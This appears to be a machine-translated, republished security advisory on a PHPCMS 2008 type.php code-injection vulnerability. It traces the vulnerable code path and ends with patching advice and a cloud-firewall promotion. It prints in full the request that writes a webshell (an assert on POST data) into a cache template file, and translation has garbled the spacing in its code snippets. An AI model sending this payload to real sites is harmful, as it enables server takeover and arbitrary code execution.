Shulou(Shulou.com)06/01 Report--

How to solve PHPCMS2008 / type.php code injection CVE vulnerability, many novices are not very clear, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

PHPCMS website content management system is not only one of the mainstream CMS systems in China, but also an open source PHP development framework.

PHPCMS was first launched in 2008, and the latest version has been released in v9.6.3, but today, due to its stability, flexibility and open source, the PHPCMS2008 version is still used by many websites.

Details of the vulnerability

When an attacker sends a payload with the following text uri to a website with PHPCMS 2008 installed

/ type.php?template=tag_ () {}; @ unlink (_ FILE_); assert ($_ POST [1]); {/ /.. / rss

Then @ unlink (_ FILE_); assert ($_ POST [1]); this malicious php instruction will be written to the / cache_template/rss.tpl.php file of the website.

Loophole principle

The vulnerability is due to the / type.php file in the PHPCMS 2008 source code. The file contains the following code:

If (empty ($template)) $template = 'type';...include template (' phpcms', $template)

Here the template variable can be controlled by the user by passing in parameters, and you can see that the variable is then passed into the template () method. The template () method is defined in the / include/global.func.php file and contains the following code:

Template_compile ($module, $template, $istag)

It is not difficult to see that template_compile () in / include/template.func.php will continue to be called here:

Function template_compile ($module, $template, $istag = 0) {... $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php'; $content = ($istag | | substr ($template, 0,4) = = 'tag_')?' .template _ parse ($content, 1).'': template_parse ($content); $strlen = file_put_contents ($compiledtplfile, $content);.}

In this method, the template variable is used to generate both the file path in the compiledtplfile variable and the file content in the content variable.

The attack payload described earlier sets the template variable to the following value

Tag_ () {}; @ unlink (_ FILE_); assert ($_ POST [1]); {/ /.. / rss

So in the template_compile () method, the first parameter when calling the file_put_contents () function is written as data/cache_template/phpcms_tag_ () {}; @ unlink (_ FILE_); assert ($_ POST [1]); {/ /.. / rss.tpl.php, which will be parsed into data/cache_template/rss.tpl.php by php.

Finally, @ unlink (_ FILE_); assert ($_ POST [1]); will be written to the file.

Scope of influence

Although it has been 10 years since the launch of the PHPCMS2008 version, there are still many websites using PHPCMS2008, including government and corporate websites; according to the accurate web search results of the Fofa cyberspace security search engine, there are nearly 200 websites using the PHPCMS2008 version; and if fuzzy matching is used to identify websites, tens of thousands of matching results will be obtained.

By exploiting this vulnerability, after an attacker writes malicious script code to a file with a controllable path, an attacker will be able to send webshell instructions to the file and execute arbitrary code on the server, so the code injection vulnerability has a greater impact.

Safety recommendation

Manual repair

Temporary resolution can filter template variables in the / type.php file to prevent user input containing symbols such as "(", "{" and so on from being mixed in, and treated as paths and script content.

However, as the PHPCMS2008 version is too old, users should try to upgrade to the latest version of PHPCMS in order to better ensure security.

Safety reinforcement

Cloud firewall supports intrusion prevention against such vulnerabilities. IPS blocking mode and virtual patching feature of cloud firewall are enabled. Users can still defend and block them even if they do not fix them themselves.

By purchasing the security butler service, you will be able to carry out security reinforcement and optimization under the guidance of Aliyun security experts to prevent the system from being affected by this vulnerability and other subsequent vulnerabilities.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.